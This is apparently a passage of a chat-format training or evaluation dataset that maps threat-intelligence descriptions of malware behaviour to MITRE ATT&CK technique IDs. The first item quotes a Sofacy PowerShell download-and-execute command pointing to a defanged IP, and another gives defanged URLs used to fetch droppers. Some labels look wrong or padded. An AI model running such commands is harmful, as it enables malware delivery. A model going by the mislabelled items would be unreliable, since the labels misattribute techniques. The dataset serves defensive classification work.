- "content": "The following shows this unused command, which exposed an additional server within Sofacy’s infrastructure would download and execute an encoded PowerShell script from 92.114.92[.]102: C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -Whidden $e=(New-ObjectSystem.Net.webClient).downloadString('hxxp://92.114.92[.]102:80/d');powershell -enc $e # The unused command above appears to be related to previous attacks, specifically attacks that occurred in November 2017 as discussed by McAfee and ESET"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can collect process filenames and SID authority level."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can use the Windows user name to create a unique identification for infected users and systems."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%\\12-B-366.txt"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": ". . The bot will report key information back to the C&C, including the result of the various custom API executions. The first communications include any hard-coded C&C followed by the DGA. Shifu uses RC4 encryption in the network communications. Notably, the key for the samples analyzed by iSIGHT Partners is actually the default RC4 key included with the Crypto library, further suggesting this malware is under development. The following is the key observed:"
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used a keylogger called GEARSHIFT on a target system."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has the ability to take screenshots on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The net accounts and net accounts /domain commands with can be used to obtain password policy information."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encrypted Configuration in shellcode The configuration information for the malware, including the C2 information are encrypted in the first shellcode blob and are passed as an argument to the DllMain function of the main PlugX DLL"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1140 - Deobfuscate/Decode Files or Information', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stop the running xmlprov service - Copy dropped xmlprov.dll and xmlrov.ini into the system32 directory and delete them from the current directory - Check if xmlProv service is installed or not and if it is not installed create the service through svchost.exe - Modify the xmlProv service values including type and binpath - Add xmlProv to the list of the services to be loaded by svchost - add xmlProv to the xmlProv registry key - Start the xmlProv service"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has embedded malicious macros within spearphishing attachments to download additional files."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz's \"MISC::AddSid\" module can appended any SID or user/group account to a user's SID-History. Mimikatz also utilizes SID-History Injection to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain."
- },
- {
- "role": "assistant",
- "content": "T1134.005 - Access Token Manipulation: SID-History Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the victim's operating system version and keyboard layout and sends the information to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data"
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper has a module to delete itself from the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can spawn a job to inject into LSASS memory and dump password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill has the capability to discover the system OS, Windows version, architecture and environment."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "pngdowner deletes content from C2 communications that was saved to the user's temporary directory."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker can encrypt files on infected machines to extort victims."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IronNetInjector can use IronPython scripts to load payloads with the help of a .NET injector."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "59 60 61 62 freeimage_32.dll freeimageplus_32.dll freeimage_64.dll freeimageplus_64.dll FreeImage open source library supports popular graphics image formats (ver 3.15.4 2012-10-27) (http://freeimage.sourceforge.net)"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used a payload that removes itself after running. TeamTNT also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire has the ability to automatically send collected data back to the threat actors' C2."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa has deleted batch files after execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper installs 2 files:netwf.bat : executes netwf.dllnetwf.dll : the payloadThe dropper implements 2 persistence mechanisms:HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat fileCOM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3D-C4579291692E}, the CLSID of the class MMDeviceEnumerator.These 2 techniques have also been previously used by this actor.Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by explorer.exe if the COM Object hijack is performed"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The malicious .rtf file exploits CVE-2017-11882. 3) The malware creates a child process, “mshta.exe,” which downloads a file from: hxxp://mumbai-m[.]site/b.txt. 4) b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The logging functions are hooked so that whenever the backdoor is used, nothing gets sent to the logging facility, leaving no trace of the backdoor in the log files on disk. If the backdoor is not in use, logging will behave normally and function calls will get redirected to the original function implementation"
- },
- {
- "role": "assistant",
- "content": "T1562.006 - Impair Defenses: Indicator Blocking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can generate a UAC pop-up Window to prompt the target user to run a command as the administrator."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete uses the \"netsh wlan show networks mode=bssid\" and \"netsh wlan show interfaces\" commands to list all nearby WiFi networks and connected interfaces."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has downloaded files to a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main code is run in a separate thread: every 10 minutes, the application contacts the C&C server motivation[.]neighboring[.]site and passes it the computer's identifier in the User-Agent string. The identifier is a SuperFastHash of the system volume serial number and the name of the computer"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty uses a keylogger plugin to gather keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used Base64 to encode C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Rundll32 for executing the dropper program."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can obtain network information, including DNS, IP, and proxies."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used JavaScript files to execute its POWERSTATS payload."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors' backdoors were written in Python and compiled with py2exe."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can remotely activate the victim’s webcam to capture content."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can scan for open TCP ports on the target network."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can execute remote commands using bash scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Loads the image resource with name `T__6541957882` into memory. 3) Adds `0xEE` to the bytes to decode the DLL. 4) Reflectively loads decoded DLL into memory and executes it"
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has used a publicly-available PowerShell-based tool, WMImplant. The group has also used PowerShell to perform Timestomping."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can generate encrypted, compressed/encoded, or otherwise obfuscated code modules."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner used an MSI installer to install the virtualization software."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JSS Loader has the ability to download and execute PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RobbinHood uses cmd.exe on the victim's computer."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use Window admin shares (C$ and ADMIN$) for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under \"HKCU\\Software\\Microsoft\\Office\\\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StreamEx establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stages collected data in a text file."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has used cmd.exe and batch scripts to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke has the ability to create a process."
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of performing remote command execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main function within the ISMInjector assembly uses the Joiner module to construct the final payload and the Inner module to inject the final payload into a process. Figure 4 shows the ISMInjector’s main function that uses the two modules to carry out its injection process before exiting"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once a file is uploaded, Machete will delete it from the machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are “1.3” and “KdfrJKN”"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has relied upon users clicking on links to malicious files."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses wevtutil to clear the Windows event logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing LAPSUS$ to take control of an authenticated system."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN5 maintains access to victim environments by using FLIPSIDE to create a proxy for a backup RDP tunnel."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY can exfiltrate collected information from the host to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses rundll32 within entries to execute malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor has deleted files using the VBA \"kill\" function."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A file stealer can communicate over HTTP for C2."
